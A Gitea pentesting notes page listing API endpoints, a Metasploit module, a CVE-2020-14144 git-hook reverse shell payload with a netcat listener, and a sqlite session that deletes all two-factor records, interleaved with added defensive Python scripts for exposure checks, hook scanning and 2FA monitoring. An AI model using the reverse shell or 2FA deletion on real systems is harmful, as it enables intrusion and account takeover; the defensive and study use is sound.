Exploit Notes

Gitea Pentesting

Last modified: 2023-03-18


Gitea is a forge software package for hosting software development version control using Git.

Common Directories

/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users

# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
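The following script is an added example (not part of the original notes) that turns the list above into a hardening check: it requests each path with no credentials and reports which ones still answer 200. It assumes a stock Gitea URL layout and that an instance with `REQUIRE_SIGNIN_VIEW = true` in the `[service]` section of app.ini answers the explore pages and search API with a redirect to the login page or a 401/403 rather than 200. The OpenID discovery document and the JWKS endpoint are public by design, so they are listed separately instead of being counted as exposures. The `status_of` parameter and the `http://localhost:3000` default are assumptions introduced here so the function can be exercised offline.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, List

# Paths taken from the list above. The OpenID discovery document and the JWKS endpoint
# are meant to be public, so they are reported separately rather than as exposures.
PUBLIC_BY_DESIGN = {"/.well-known/openid-configuration", "/login/oauth/keys"}
GITEA_PATHS = [
    "/api/swagger",
    "/api/v1/repos/search?q=test",
    "/api/v1/users/search?q=test",
    "/explore/organizations",
    "/explore/repos",
    "/explore/users",
    "/.well-known/openid-configuration",
    "/login/oauth/keys",
]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a 302 to /user/login is exactly the signal we want to keep."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_status(url: str) -> int:
    """GET the URL with no credentials and return the raw status code."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "gitea-exposure-check"})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx all land here with _NoRedirect
        return err.code


def audit_exposure(
    base_url: str,
    paths: List[str] = GITEA_PATHS,
    status_of: Callable[[str], int] = http_status,
) -> Dict[str, List[str]]:
    """Classify each path by how the instance answers an anonymous request.

    'exposed'          -> 200 on a path that should be gated by REQUIRE_SIGNIN_VIEW
    'gated'            -> anything else (redirect to login, 401, 403, 404, ...)
    'public_by_design' -> OAuth/OpenID discovery endpoints, listed for completeness
    """
    report: Dict[str, List[str]] = {"exposed": [], "gated": [], "public_by_design": []}
    base = base_url.rstrip("/")
    for path in paths:
        if path in PUBLIC_BY_DESIGN:
            report["public_by_design"].append(path)
            continue
        code = status_of(base + path)
        report["exposed" if code == 200 else "gated"].append(path)
    return report


if __name__ == "__main__":
    import json
    import sys

    # Assumed default: Gitea listens on port 3000 unless configured otherwise.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
    print(json.dumps(audit_exposure(target), indent=2))
```

Run it as `python3 check.py https://git.example.org` against your own instance. Note that `/api/swagger` is controlled by `ENABLE_SWAGGER` in the `[api]` section rather than by the sign-in requirement, so it can legitimately show up as exposed on an instance that gates everything else; set `ENABLE_SWAGGER = false` if the API documentation should not be served to anonymous clients.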

Investigation

Get Secrets in Web Hooks

In an existing repository, the webhook secret may be readable under the repository → Settings → Web Hooks.


Git Fetch Remote Code Execution (RCE)

Metasploit

msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run

Git Hooks Remote Code Execution (RCE)

This is CVE-2020-14144.

1. Login

Access the Gitea dashboard and log in with an existing account.

2. Create a New Repository

3. Go to the Repository’s Settings

In the new repository we’ve created, go to Settings → Git Hooks → post-receive.

4. Update to the Reverse Shell Payload

In the post-receive edit page, inject the payload as below:

#!/bin/bash

bash -i >& /dev/tcp/10.0.0.1/4444

5. Start Listener in Terminal

To receive the outgoing connection from the git hook, start a listener.

nc -lvnp 4444

6. Create the New Repository in Terminal

mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master

After the push, the git hook triggers and executes the reverse shell command.
Now we should have a shell.
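From the defender's side, the two things to check after reading the procedure above are whether the instance still allows users to write custom hooks at all, and whether any repository on disk already carries one. The script below is an added example (not from the original notes and not Gitea project code). It assumes that custom hooks are controlled by `DISABLE_GIT_HOOKS` in the `[security]` section of app.ini (default true in current Gitea), and that the hook files Gitea generates for itself contain the comment marker `AUTO GENERATED BY GITEA`; it does not assume where under `hooks/` Gitea stores a user-supplied hook, so it walks every `hooks/` directory recursively. The `alice/test.git` repository, its hook contents and the sample app.ini are constructed for the demo.

```python
import configparser
import os
import tempfile
from pathlib import Path
from typing import List, Tuple

# Assumption: Gitea writes this comment into the hook scripts it generates itself.
GITEA_MARKER = "AUTO GENERATED BY GITEA"


def git_hooks_enabled(app_ini_text: str) -> bool:
    """True when app.ini lets users define custom hooks ([security] DISABLE_GIT_HOOKS = false).

    Gitea's ini may have keys before the first section header, which configparser
    rejects, so the text is parsed under a synthetic [DEFAULT] section.
    """
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string("[DEFAULT]\n" + app_ini_text)
    value = cfg.get("security", "DISABLE_GIT_HOOKS", fallback="true")  # assumed default: true
    return value.strip().strip('"').lower() in ("false", "0", "off", "no")


def find_custom_hooks(repo_root: str) -> List[str]:
    """Paths (relative to repo_root) of hook scripts that Gitea did not generate.

    Anything under a hooks/ directory that is not a *.sample file and does not carry
    the Gitea marker is reported, whatever its exact location inside hooks/.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(repo_root):
        rel_dir = Path(os.path.relpath(dirpath, repo_root))
        if "hooks" not in rel_dir.parts:
            continue
        for name in files:
            if name.endswith(".sample"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", errors="replace") as fh:
                    head = fh.read(2048)
            except OSError:
                continue
            if GITEA_MARKER in head:
                continue
            findings.append(os.path.relpath(full, repo_root))
    return sorted(findings)


def build_sample_tree(root: str) -> None:
    """Constructed layout: one bare repo with Gitea's own hooks plus one user-supplied hook."""
    hooks = Path(root, "alice", "test.git", "hooks")
    (hooks / "post-receive.d").mkdir(parents=True)
    generated = "#!/usr/bin/env bash\n# AUTO GENERATED BY GITEA, DO NOT MODIFY\n"
    (hooks / "post-receive").write_text(generated + "# delegates to post-receive.d/*\n")
    (hooks / "post-receive.d" / "gitea").write_text(generated + "# calls the gitea binary\n")
    (hooks / "post-receive.d" / "custom").write_text("#!/bin/bash\n# constructed: user hook\necho hello\n")
    (hooks / "pre-receive.sample").write_text("# git's own sample, ignored\n")


def demo() -> Tuple[bool, List[str]]:
    """Run both checks against the constructed app.ini and repository tree."""
    sample_ini = "APP_NAME = Gitea\n[security]\nDISABLE_GIT_HOOKS = false\n"
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return git_hooks_enabled(sample_ini), find_custom_hooks(root)


if __name__ == "__main__":
    enabled, hooks = demo()
    print("custom git hooks enabled:", enabled)
    print("non-Gitea hook scripts:", hooks)
```

On a real host point `find_custom_hooks` at the repository root from `[repository] ROOT` in app.ini and feed `git_hooks_enabled` the contents of app.ini itself. Any hit from the scanner on an instance where hooks are supposed to be disabled deserves a look at the file's modification time and the repository's settings audit trail, and the durable fix is to keep `DISABLE_GIT_HOOKS = true` and grant the git-hooks privilege to nobody who does not already have shell access to the server.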


Swagger API

We can access /api/swagger to interact with the Swagger API.

Get New Token & Authorize

We need a token to use the Swagger API.

  1. Register a new account on the Gitea top page.
  2. Go to /user/settings/applications and generate a new token.
  3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
  4. Go to /api/swagger.
  5. Click the “Authorize” button. The modal window opens.
  6. Paste the token in the “Token” section.

Delete the Two-Factor

victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
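The session above leaves no trace in Gitea's own UI: the affected users simply stop being prompted for a second factor. A cheap way to notice it is a periodic snapshot of who is enrolled, diffed against the previous run. The script below is an added example (not from the original notes and not Gitea code); it assumes only that gitea.db contains a `two_factor` table whose `uid` column references `user.id`, and the schema it creates is a constructed subset with just those columns. The users `alice`, `bob` and `carol` are constructed data. The database is opened read-only through a URI so the monitoring job itself can never alter it.

```python
import os
import sqlite3
import tempfile
from typing import Dict, List

# Constructed subset of the Gitea SQLite schema, enough for the demo: the `user` table and
# the `two_factor` table whose `uid` column points at the enrolled user. The real gitea.db
# has many more columns; the query below only touches these.
CONSTRUCTED_SCHEMA = """
CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE two_factor (id INTEGER PRIMARY KEY, uid INTEGER NOT NULL UNIQUE);
"""


def snapshot_2fa(db_path: str) -> Dict[int, str]:
    """Return {user id: user name} for every user that currently has a two_factor row."""
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)  # read-only open
    try:
        rows = conn.execute(
            "SELECT u.id, u.name FROM two_factor t JOIN user u ON u.id = t.uid"
        ).fetchall()
    finally:
        conn.close()
    return {uid: name for uid, name in rows}


def lost_enrolments(previous: Dict[int, str], current: Dict[int, str]) -> List[str]:
    """Names of users present in the previous snapshot but missing from the current one.

    One disappearance can be a user turning 2FA off; several at once, with no matching
    entries in the application log, is the pattern a bulk DELETE on two_factor leaves.
    """
    return sorted(name for uid, name in previous.items() if uid not in current)


def demo() -> List[str]:
    """Build a throwaway gitea.db, take a baseline, replay the DELETE, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        db_path = os.path.join(tmp, "gitea.db")
        conn = sqlite3.connect(db_path)
        conn.executescript(CONSTRUCTED_SCHEMA)
        conn.executemany("INSERT INTO user VALUES (?, ?)", [(1, "alice"), (2, "bob"), (3, "carol")])
        conn.executemany("INSERT INTO two_factor (uid) VALUES (?)", [(1,), (2,)])
        conn.commit()
        conn.close()

        before = snapshot_2fa(db_path)

        conn = sqlite3.connect(db_path)
        conn.execute("DELETE FROM two_factor")  # the same statement as in the session above
        conn.commit()
        conn.close()

        after = snapshot_2fa(db_path)
        return lost_enrolments(before, after)


if __name__ == "__main__":
    print("users whose 2FA enrolment disappeared:", demo())
```

In practice `snapshot_2fa` would run from cron, write its result to a file outside the Gitea data directory, and alert when `lost_enrolments` against the previous file is non-empty. The underlying control is file permissions: a process that can open gitea.db for writing can undo every authentication setting the application stores in it, so the database (and the backups of it) should be readable only by the Gitea service account.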
